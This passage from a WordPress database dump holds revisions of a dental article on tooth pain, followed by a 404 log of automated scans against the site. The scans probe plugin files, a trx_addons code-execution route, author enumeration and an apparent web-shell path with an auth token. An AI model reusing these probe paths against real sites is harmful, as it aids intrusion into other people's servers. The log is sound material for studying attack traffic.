teeth and exposes the roots of the person’s teeth.\n\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\n<ul>\n <li>The toothache lasts for more than 48 hours</li>\n <li>The pain is still there after taking pain killers</li>\n <li>Pain is experienced when biting</li>\n <li>You have red or swollen gums</li>\n <li>There is a bad taste in your mouth</li>\n <li>You have a swollen cheek or jaw</li>\n</ul>\nIgnoring tooth pain can prevent a possible sign of something serious of being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or an infection then it is critical that the person seeks dental help in order to fix the problem and give the patient a clean bill of health.\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\n<ul>\n <li><strong>Neglect</strong></li>\n <li><strong>Depression</strong></li>\n <li><strong>Lack of sleep</strong></li>\n <li><strong>Eating disorders</strong></li>\n <li><strong>Medication dependency</strong></li>\n</ul>\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-autosave-v1','','','2021-07-20 08:42:15','2021-07-20 08:42:15','',234,'https://teethwhiteningproduct.co.uk/?p=242',0,'revision','',0),(243,1,'2021-07-20 08:43:03','2021-07-20 08:43:03','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because tooth pain may go away doesn’t mean that the problem has disappeared too. When experiencing tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for day-to-day duties to be carries out, such as:\r\n<ul>\r\n <li><strong>Eating</strong></li>\r\n <li><strong>Talking</strong></li>\r\n <li><strong>Drinking</strong></li>\r\n <li><strong>Exercising</strong></li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than others. Common causes of tooth pain can range from:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\nTooth pain can be very <strong>sharp, painful and a constant ache</strong> that has links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile some tooth pain may be a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking painkillers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious from being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or infection then the person must seek dental help to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li><strong>Neglect</strong></li>\r\n <li><strong>Depression</strong></li>\r\n <li><strong>Lack of sleep</strong></li>\r\n <li><strong>Eating disorders</strong></li>\r\n <li><strong>Medication dependency</strong></li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 08:43:03','2021-07-20 08:43:03','',234,'https://teethwhiteningproduct.co.uk/?p=243',0,'revision','',0),(244,1,'2021-07-20 08:43:45','2021-07-20 08:43:45','<a href=\"https://teethwhiteningproduct.co.uk/\"><img class=\"alignnone wp-image-235\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/teeth-5536858_1920.jpg\" alt=\"tooth pain\" width=\"442\" height=\"295\" /></a>\r\n<h2><a href=\"/\">Why is it important not to ignore tooth pain?</a></h2>\r\nJust because tooth pain may go away doesn’t mean that the problem has disappeared too. When experiencing tooth pain, there is a possibility it can be the start of a serious problem if not treated quickly.\r\n\r\nTooth pain is hard for anyone to ignore due to its sharp pain and dentists recommend booking an appointment if the pain is recurring – especially if it is not getting better within time and hard for day-to-day duties to be carries out, such as:\r\n<ul>\r\n <li><strong>Eating</strong></li>\r\n <li><strong>Talking</strong></li>\r\n <li><strong>Drinking</strong></li>\r\n <li><strong>Exercising</strong></li>\r\n</ul>\r\nA tooth pain that is developed can have a variety of causes; some may be more common and easier to treat than others. Common causes of tooth pain can range from:\r\n<ul>\r\n <li>Tooth decay</li>\r\n <li>Broken tooth</li>\r\n <li>Gum infection</li>\r\n <li>Eruption</li>\r\n <li>Repetitive chewing or clenching</li>\r\n</ul>\r\nTooth pain can be very <strong>sharp, painful and a constant ache</strong> that has links to serious oral diseases, such as gum diseases – i.e. <a href=\"https://www.healthline.com/health/gingivitis\" target=\"_blank\" rel=\"noopener\">gingivitis and periodontitis</a>.\r\n\r\nWhile some tooth pain may be a result of people having sensitive teeth, there is a strong link between gum disease and sensitive teeth. Gum disease <a href=\"https://www.webmd.com/oral-health/toothache\" target=\"_blank\" rel=\"noopener\">doesn’t only cause a person to have sensitive teeth</a>; it causes gums to shrink away from their teeth and exposes the roots of the person’s teeth.\r\n\r\n<img class=\"wp-image-237 alignright\" src=\"https://teethwhiteningproduct.co.uk/wp-content/uploads/2021/07/pexels-cedric-fauntleroy-4270088-scaled.jpg\" alt=\"tooth pain\" width=\"232\" height=\"348\" />\r\n\r\n<a href=\"https://thegentledental.co.uk/emergency-dentist/throbbing-tooth-pain-and-toothache\" target=\"_blank\" rel=\"noopener\">It is vital to see a dentist</a> for tooth pain if:\r\n<ul>\r\n <li>The toothache lasts for more than 48 hours</li>\r\n <li>The pain is still there after taking painkillers</li>\r\n <li>Pain is experienced when biting</li>\r\n <li>You have red or swollen gums</li>\r\n <li>There is a bad taste in your mouth</li>\r\n <li>You have a swollen cheek or jaw</li>\r\n</ul>\r\nIgnoring tooth pain can prevent a possible sign of something serious from being discovered. If the tooth pain is a sign of a cavity, wisdom tooth or infection then the person must seek dental help to fix the problem and give the patient a clean bill of health.\r\n<blockquote>Avoiding dental help because of costs or long waiting times for an appointment is not the best thing for patients to do. While some issues can go away within time, not all issues do and risking your oral hygiene is not something to consider – keeping a clean bill of health is utterly important and should be everyone’s top priority!</blockquote>\r\nExperiencing tooth pain can also interfere with a person’s declining mental health. Those who have tooth pain <a href=\"https://www.dentalhealth.org/mental-illness-and-oral-health\" target=\"_blank\" rel=\"noopener\">can also have</a>:\r\n<ul>\r\n <li><strong>Neglect</strong></li>\r\n <li><strong>Depression</strong></li>\r\n <li><strong>Lack of sleep</strong></li>\r\n <li><strong>Eating disorders</strong></li>\r\n <li><strong>Medication dependency</strong></li>\r\n</ul>\r\nIf you are experiencing any tooth pain, it is important to have it accessed so the issue can be easily treated.','The dangers of ignoring tooth pain','','inherit','closed','closed','','234-revision-v1','','','2021-07-20 08:43:45','2021-07-20 08:43:45','',234,'https://teethwhiteningproduct.co.uk/?p=244',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_redirection_404`
--
DROP TABLE IF EXISTS `wp_redirection_404`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_redirection_404` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`created` datetime NOT NULL,
`url` varchar(255) NOT NULL DEFAULT '',
`agent` varchar(255) DEFAULT NULL,
`referrer` varchar(255) DEFAULT NULL,
`ip` varchar(45) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `created` (`created`),
KEY `url` (`url`(191)),
KEY `referrer` (`referrer`(191)),
KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=61513 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_redirection_404`
--
LOCK TABLES `wp_redirection_404` WRITE;
/*!40000 ALTER TABLE `wp_redirection_404` DISABLE KEYS */;
INSERT INTO `wp_redirection_404` VALUES (61220,'2021-06-09 13:01:27','/wp-json/trx_addons/v2/get/sc_layout?sc=print_r','python-requests/2.18.4',NULL,'78.46.210.120'),(61221,'2021-06-09 15:33:07','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','143.198.175.237'),(61222,'2021-06-09 15:33:19','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','143.198.175.237'),(61223,'2021-06-09 15:33:37','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','143.198.175.237'),(61224,'2021-06-09 15:33:57','/admin.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','www.google.com','143.198.175.237'),(61225,'2021-06-09 17:15:02','/?author=2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','http://teethwhiteningproduct.co.uk///?author=2','185.235.41.80'),(61226,'2021-06-09 20:58:47','//wp-json/td/v1/optin/subscription','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61227,'2021-06-09 20:58:48','//index.php?rest_route=/td/v1/optin/subscription','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61228,'2021-06-09 20:58:52','//wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61229,'2021-06-09 20:58:53','/wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','103.88.170.246'),(61230,'2021-06-09 20:58:54','//wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61231,'2021-06-09 20:58:55','/wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/theplus_elementor_addon/assets/css/admin/theplus-ele-admin.css','103.88.170.246'),(61232,'2021-06-09 20:58:57','//wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61233,'2021-06-09 20:58:58','/wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','103.88.170.246'),(61234,'2021-06-09 20:58:59','//wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61235,'2021-06-09 20:59:00','/wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/quadmenu/assets/frontend/js/quadmenu.js','103.88.170.246'),(61236,'2021-06-09 20:59:06','//wp-content/plugins/kaswara/front/assets/js/script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61237,'2021-06-09 20:59:07','/wp-content/plugins/kaswara/front/assets/js/script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/kaswara/front/assets/js/script.js','103.88.170.246'),(61238,'2021-06-09 20:59:08','//wp-content/plugins/kaswara/front/assets/js/script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61239,'2021-06-09 20:59:08','/wp-content/plugins/kaswara/front/assets/js/script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/kaswara/front/assets/js/script.js','103.88.170.246'),(61240,'2021-06-09 20:59:11','//wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61241,'2021-06-09 20:59:12','/wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61242,'2021-06-09 20:59:13','//wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61243,'2021-06-09 20:59:14','/wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-admin/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61244,'2021-06-09 20:59:15','//wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61245,'2021-06-09 20:59:16','/wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61246,'2021-06-09 20:59:18','//wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61247,'2021-06-09 20:59:18','/wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61248,'2021-06-09 20:59:20','//wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61249,'2021-06-09 20:59:21','/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61250,'2021-06-09 20:59:22','//wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61251,'2021-06-09 20:59:22','/wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/uploads/upload_index.php?auth=f02pz3831W0DTtLgq26L','103.88.170.246'),(61252,'2021-06-09 20:59:30','//my-account','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61253,'2021-06-09 20:59:31','/my-account','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//my-account','103.88.170.246'),(61254,'2021-06-09 20:59:32','//my-account','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61255,'2021-06-09 20:59:32','/my-account','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//my-account','103.88.170.246'),(61256,'2021-06-09 20:59:34','//register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61257,'2021-06-09 20:59:35','/register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//register','103.88.170.246'),(61258,'2021-06-09 20:59:36','//register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61259,'2021-06-09 20:59:37','/register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//register','103.88.170.246'),(61260,'2021-06-09 20:59:38','//signup','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61261,'2021-06-09 20:59:39','/signup','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//signup','103.88.170.246'),(61262,'2021-06-09 20:59:41','//signup','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61263,'2021-06-09 20:59:41','/signup','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//signup','103.88.170.246'),(61264,'2021-06-09 20:59:42','//registration','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61265,'2021-06-09 20:59:44','/registration','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//registration','103.88.170.246'),(61266,'2021-06-09 20:59:45','//registration','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61267,'2021-06-09 20:59:45','/registration','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//registration','103.88.170.246'),(61268,'2021-06-09 20:59:48','//wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61269,'2021-06-09 20:59:49','/wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','103.88.170.246'),(61270,'2021-06-09 20:59:51','//wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61271,'2021-06-09 20:59:51','/wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/wp-content-copy-protector/js/simpletabs_1.3.js','103.88.170.246'),(61272,'2021-06-09 20:59:52','//wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61273,'2021-06-09 20:59:53','/wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','103.88.170.246'),(61274,'2021-06-09 20:59:55','//wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61275,'2021-06-09 20:59:55','/wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/visitors-traffic-real-time-statistics/js/front.js','103.88.170.246'),(61276,'2021-06-09 20:59:57','//wp-content/plugins/external-media/js/external-media.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61277,'2021-06-09 20:59:58','/wp-content/plugins/external-media/js/external-media.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/external-media/js/external-media.js','103.88.170.246'),(61278,'2021-06-09 20:59:59','//wp-content/plugins/external-media/js/external-media.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61279,'2021-06-09 21:00:00','/wp-content/plugins/external-media/js/external-media.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/external-media/js/external-media.js','103.88.170.246'),(61280,'2021-06-09 21:00:01','//wp-content/plugins/store-locator-le/js/slp_core.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61281,'2021-06-09 21:00:02','/wp-content/plugins/store-locator-le/js/slp_core.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/store-locator-le/js/slp_core.js','103.88.170.246'),(61282,'2021-06-09 21:00:03','//wp-content/plugins/store-locator-le/js/slp_core.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61283,'2021-06-09 21:00:04','/wp-content/plugins/store-locator-le/js/slp_core.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/store-locator-le/js/slp_core.js','103.88.170.246'),(61284,'2021-06-09 21:00:05','//wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61285,'2021-06-09 21:00:06','/wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','103.88.170.246'),(61286,'2021-06-09 21:00:07','//wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61287,'2021-06-09 21:00:08','/wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/wpcf7-redirect/js/wpcf7-redirect-script.js','103.88.170.246'),(61288,'2021-06-09 21:00:09','//wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',NULL,'103.88.170.246'),(61289,'2021-06-09 21:00:10','/wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36','https://teethwhiteningproduct.co.uk//wp-content/plugins/cmp-coming-soon-maintenance/js/cmp-advanced.js','103.88.170.246'),(61290,'2021-06-09 